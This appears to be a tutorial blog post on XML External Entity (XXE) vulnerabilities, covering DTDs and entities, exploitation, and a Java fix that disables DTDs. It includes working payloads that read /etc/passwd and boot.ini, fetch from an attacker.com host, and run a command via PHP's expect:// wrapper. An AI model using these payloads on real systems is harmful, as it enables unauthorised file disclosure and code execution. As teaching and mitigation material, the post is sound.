Extensible Markup Language (XML) has an infamous feature called XML eXternal Entities (XXE). It is the most well-known XML attack vector and still has a high place in the OWASP Top 10 most common vulnerabilities list.
This blog post explains how to exploit the vulnerability to gain access to sensitive data and also how to mitigate it.
Introduction
XXE enables an attacker to craft malicious XML documents. When these documents are parsed by a vulnerable XML parser, data can be fetched from outside the document itself. This data will be parsed as the content of your chosen XML tag. The data can be the contents of a file or the response from an HTTP request.
Oftentimes the contents of an XML tag are displayed back to you, for example in a web page. This way you can view any sensitive data you’ve gained using XXE.
As this feature is a part of the main XML standard, it is usually enabled by default and must be turned off manually in a parser-specific way.
Understanding XXE and DTD
What is a DTD?
A DTD is a Document Type Definition, which defines the structure and the legal elements and attributes of an XML document.
Using a DTD, independent groups of people can agree on a standard document format for exchanging data. Applications can use DTDs to verify that XML data corresponds to the specified format.
If the DTD is declared inside the XML file, it must be wrapped inside the <!DOCTYPE>
definition:
<?xml version="1.0"?>
<!DOCTYPE note [
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
]>
<note>
<to>Brian</to>
<from>Jane</from>
<heading>Reminder</heading>
<body>Don't forget to bring my jacket!</body>
</note>
As you can see above, the DTD defines that there is a note
element, which in turn has the child elements to
, from
, heading
and body
.
Entities
Some characters have a special meaning in XML, like the less than sign <
, which defines the start of an XML tag. Another example is the &
sign, which specifies the start of a character entity.”
You may already know the HTML entity:
. This “no-breaking-space” entity is used in HTML, and it expands to insert an extra space in a document. Just like in HTML, entities are expanded in XML when a document is parsed by an XML parser.
Exploitation
Example code
Here are some examples about how to use XXE to read data from a variety of resources, courtesy of OWASP.
1) Reading /etc/passwd
on Linux
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
2) Reading files on Windows
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
3) Making HTTP requests
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://www.attacker.com/text.txt" >]><foo>&xxe;</foo>
Step-by-step exploitation
Example application
Let’s say we have an application where you can leave notes that other people can read. An XML request to this application might look something like this:
<note>
<to>Brian</to>
<from>Jane</from>
<heading>Reminder</heading>
<body>Don't forget to bring my jacket!</body>
</note>
The application parses the XML request and displays a note from Jane with the heading “Reminder” and the body “Don’t forget to bring my jacket!”.
Our goal in this example will be to read the contents of the /etc/passwd
file. It’s a convenient file to use because you can usually count on it existing on a Linux system. We want the contents of /etc/passwd
to appear in the body section of the note.
Malicious request
If External Entities are enabled, a malicious note could be created like so:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<note>
<to>Brian</to>
<from>Jane</from>
<heading>Reminder</heading>
<body>&xxe;</body>
</note>
As a result, the note to Brian will have the contents of /etc/passwd
in its body.
Other attacks
PHP Remote Code Execution
If the PHP “expect” module is loaded, we can get RCE.
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>
Custom attacks on various applications
It used to be possible to get Remote Code Execution in many different code editors due to an XXE flaw. It was patched quickly, but it’s an interesting read.
Fixing
The easiest option is to disable DTDs entirely. The following code is in Java:
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
DocumentBuilder builder = factory.newDocumentBuilder();
If disabling the DTD is not an option, then you must configure the XML parser to disable external entities. For more detailed information, refer to OWASP’s cheat sheet on the topic.
Conclusion
Any time you see XML used in an application, one of the first things to think about is if it’s vulnerable to an XXE attack. And when using XML in your own application, you should always check if External Entities are disabled or not.